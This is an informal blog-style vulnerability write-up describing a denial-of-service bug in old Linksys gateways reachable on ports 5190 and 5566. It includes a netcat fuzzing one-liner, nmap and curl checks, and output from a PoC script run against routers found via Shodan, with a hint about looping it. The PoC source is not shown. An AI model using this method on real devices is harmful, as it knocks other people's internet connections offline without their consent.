Two days ago i visited a friend of me. I was showing him how to discover open ports in a network with nmap. As example I chose his home gateway. His gateway is/was a WAG54G from Linksys. Without firmware uptated. Year 2009, more or less.
He was surprised when we discovered two weird ports in the gateway: 5190 and 5566 ports. He didn't have any port configured to be open but I ignored that because I thought they were some private ports to configure the gateway from a GUI in Windows or something similar.
We were speaking and connecting to some ports for a while.... and I figured out the behavior of 5566 port was different after connecting to the 5190 port. It was very odd.
If you connect to the 5566 port you will receive a fast disconnection but if you make a connection to the 5190 port before, the 5566 port is waiting data in a lot of cases. Bye bye to the fast disconnection.
So, for my curiosity i tried to fuzz the port with /dev/urandom.... something similar to:
cat /dev/urandom | nc -v 192.168.1.1 5566
Meanwhile...when I was explaining to my friend about how a protocol works, our internet connection was down.
BOOM! o_O
I said: - Ermmm... Let me try it again buddy! ..and...
BOOM! O_O
I had to come back to home. In the way, I was thinking about the port issue.
At home, my first step was to see if those ports were private or public.... and BOOM! Public!
But I didn't have any router Linksys at home to try it again... so my friend Shodan came to the rescue! ;)
The next steps are very bored but, more or less, it was a huge trial and error process and, more or less , this was the PoC conclusion:
Ingredients:
- Very old linksys: Shodan have a lot of them.
- Ports 5190 and 5566 open: Shodan has few of them but it has them.
- Nmap to confirm some data.
There we go:
$ nmap -sS -p 5190,5566 x.x.x.x
Starting Nmap 5.51 ( http://nmap.org ) at 2014-09-06 08:33 CEST
Nmap scan report for gateway (x.x.x.x)
Host is up (0.080s latency).
PORT STATE SERVICE
5190/tcp open aol
5566/tcp open westec-connect
Curl check:
$ curl -I -q --max-time 5 x.x.x.x
HTTP/1.1 401 Unauthorized
Server:
Date: Sat, 06 Sep 2014 06:31:53 GMT
WWW-Authenticate: Basic realm="Linksys WAG200G "
Content-Type: text/html
Connection: close
Ok. Ingredients Ok. We can run the PoC. Sometimes you need to run it twice or more times. Honestly I don't know why.
$ python OldLinksysMustDie.py x.x.x.x
OldLinksysMustDie v0.001b PoC
* Connecting to x.x.x.x...
* Cooking... be patient....
* On Fire!
><
><
><
[BYEBYE] Ooops! connection to the target lost. [BYEBYE]
Curl again:
curl -I -q --max-time 5 x.x.x.x
curl: (28) Operation timed out after 5001 milliseconds with 0 bytes received
And RAMBO was here! I tried others one and... all temporary dead!!
NOTE: The router is recovered 5-10 minutes after running the PoC, but, if you want a big DOS, a "loop" in the computers world is so easy..... ;)
Finally, my horrible PoC (horrible like my English) in python:
Are you ready John?
Firmware affected: